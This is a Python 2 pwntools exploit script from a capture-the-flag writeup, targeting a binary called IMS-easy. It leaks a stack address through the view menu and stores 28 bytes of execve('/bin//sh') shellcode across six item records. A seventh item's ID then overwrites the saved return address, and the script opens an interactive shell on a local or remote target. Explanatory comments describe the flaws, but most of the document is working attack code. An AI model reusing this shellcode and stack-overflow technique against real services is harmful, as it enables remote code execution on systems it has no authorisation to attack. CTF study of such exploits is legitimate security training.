
#!/usr/bin/env python

import sys

from pwn import *

# Menu selections sent to the target binary, as the decimal strings its
# menu expects (only 1, 3 and 4 are used by this script).
ADD = "1"
VIEW = "3"
QUIT = "4"

# Raw x86-32 payload bytes held in a Python 2 str (the file is Python 2:
# see the print statement under __main__).  exploit() below right-pads it to
# 6 * 12 bytes and splits it into 12-byte item records.
sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
# Distance (0x4ac - 0x3cc = 0xe0 bytes) subtracted from the leaked stack value
# to form the ID of the final item.  The two offsets were presumably read off
# the stack frame during analysis; the page does not say where they came from.
stack_offset = 0x4ac - 0x3cc

def exploit(r):
    """Drive the IMS-easy binary over tube *r* (CTF writeup proof of concept).

    The three steps correspond to three weaknesses in the target's item
    store, which is what a fix would have to address:

    1. A stack value is leaked through the "view" command: the ID of product
       7 is printed as a signed decimal and converted back to an unsigned
       32-bit value below.  Nothing has been added at that point, so this
       presumably reads an uninitialized or out-of-bounds slot -- confirm
       against the binary.
    2. Six items are added whose 8-byte name and 4-byte ID together hold the
       payload, 12 contiguous bytes per record; the IDs are never validated.
    3. A seventh item is added whose ID is a computed stack address; per the
       original comment it lands on the saved return address, i.e. the item
       count is not bounded against the on-stack array.

    r: a pwntools tube (process or remote).  Side effects only; control is
    handed to the user via r.interactive() and the function does not return
    normally.
    """
    # Leak ebp
    # r.recv() with no length drains whatever banner/menu text is pending.
    r.recv()
    r.sendline(VIEW)
    r.sendline("7")
    r.recvuntil("Product ID: ")
    addr = r.recvuntil(",")
    # The ID is printed as a signed int; adding 2**32 reinterprets a negative
    # value as an unsigned address.  This assumes the leaked value prints
    # negative -- a non-negative leak would overshoot 32 bits here.
    addr = int(hex(int(addr[:-1]) + 2**32), 0)
    log.info("Got stack address 0x{:08x}".format(addr))

    # Add 6 items that contain the shellcode
    # Pad to six 12-byte records: bytes 0..7 go in the name, 8..11 in the ID.
    sc_padded = sc.ljust(6*12)
    for i in range(6):
        si = i * 12
        r.sendline(ADD)
        # ID field: the record's last 4 bytes, sent as their little-endian
        # decimal value so the binary stores them back as raw bytes.
        r.sendline(str(u32(sc_padded[si+8:si+12])))
        # Name field: the record's first 8 bytes.
        r.sendline(sc_padded[si:si+8])

    # One more whose ID will overwrite the RA
    # addr - stack_offset is presumably the start of the first record above;
    # see the module-level stack_offset comment.  "holymoly" is filler.
    r.sendline(ADD)
    r.sendline(str(addr - stack_offset))
    r.sendline("holymoly")

    # Quit out
    # Quitting presumably returns from the vulnerable frame, at which point
    # the overwritten return address takes effect (per the comment above).
    r.recv()
    r.sendline(QUIT)
    r.interactive()

if __name__ == "__main__":
    # With HOST PORT arguments the script connects to a remote instance;
    # with no arguments it spawns ./IMS-easy locally.
    log.info("For remote: %s HOST PORT" % sys.argv[0])
    if len(sys.argv) > 1:
        # NOTE: only argv[1] is checked; a missing PORT raises IndexError.
        r = remote(sys.argv[1], int(sys.argv[2]))
        exploit(r)
    else:
        # The child gets LD_PRELOAD set to an empty string, so nothing from
        # the caller's environment is preloaded into the target process.
        r = process(['./IMS-easy'], env={"LD_PRELOAD":""})
        # Python 2 print statement.  The PID is shown and the script pauses,
        # presumably so a debugger can be attached before exploit() runs.
        print util.proc.pidof(r)
        pause()
        exploit(r)

Original writeup (https://gist.github.com/Grazfather/837adfa13af213c17029519d0953825c).